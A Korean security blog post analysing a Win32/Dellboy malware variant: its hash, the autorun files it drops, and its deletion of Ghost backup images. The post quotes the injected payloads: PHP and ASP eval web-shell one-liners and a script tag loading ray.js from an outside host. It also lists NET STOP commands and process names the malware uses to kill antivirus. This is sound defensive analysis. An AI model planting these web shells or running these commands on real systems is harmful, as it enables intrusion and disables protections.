Win32/Dellboy 바이러스 제작자는 검거 되었지만 변형은 계속 등장하고 있다.

MD5 : 5af7352bc0bd0e356aa1b408aee042c7
파일길이 : 53760

이번 변형은 바이러스 기능은 아직 찾지 못했다.

실행되면 각 드라이브에 autorun.inf 와 RECYCLER.EXE 생성한다.
플로피 디스크가 있는 시스템의 경우 플로피 디스크가 삽입되어 있지 않으면 에러가 발생 한다.

 No disk
 
 There is no disk in the drive, Please insert a disk into drive A:

사용자 삽입 이미지

플로피 디스크 드라이브에 플로피 디스크가 없을 때


이는 제작자가 모든 폴더에 RECYCLER.EXE와 AUTORUN.INF 파일을 생성하는데 미처 플로피 디스크인건 확인하지 않았기 때문이다.

시스템에서 확장자가 HTML, SHTML, ASPX 인 파일을 찾아 다음 스크립트를 삽입한다. 테스트 당시 해당 주소에는 접속되지 않았다.

<?php @eval($_POST[jokeyouphp])?>                                                                      
<script language="javascript" src="http://htmlcss.3322.org/sub/ray.js"></script
<%execute request("jokeyou")&""%>                                                                      
<script language="javascript" src="http://htmlcss.3322.org/sub/ray.js"></script>                       
<script language="javascript" src="http://htmlcss.3322.org/sub/ray.js"></script>                       

시스템에는 ntion.exe 와 ntion.dll 파일을 생성한다.

여러 보안 프로그램을 강제 종료한다.

NET STOP MonSvcNT    
NET STOP OfficeScanNT Monitor
NET STOP Norton              
NET STOP ZoneAlarm           
NET stop McShield            
NET stop V3MonSvc               ---> V3
NET stop MskService          
NET stop McTaskManager       
NET stop Symantec Core LC    
NET stop kavsvc              
NET stop spidernt            

다음 프로그램 (주로 보안 프로그램 밑 시스템 툴)

VCRMON.EXE           
KAV.EXE              
CCAPP.EXE            
NVSVC32.EXE          
SPIDERUI.EXE         
UPGRADE.EXE          
SPIDERNT.EXE         
MONSVCNT.EXE         
MONSYSNT.EXE       --> V3
TRIALREG.EXE         
SUPDATE.EXE          --> V3
AUTORUNS.EXE         
ICESWORD.EXE         
MCSHIELD.EXE         
REGEDIT.EXE          
MSCONFIG.EXE          

물론 고스트(Ghost) 이미지 파일인 확장자가 GHO 인 파일도 삭제한다.
       
Posted by mstoned7

댓글을 달아 주세요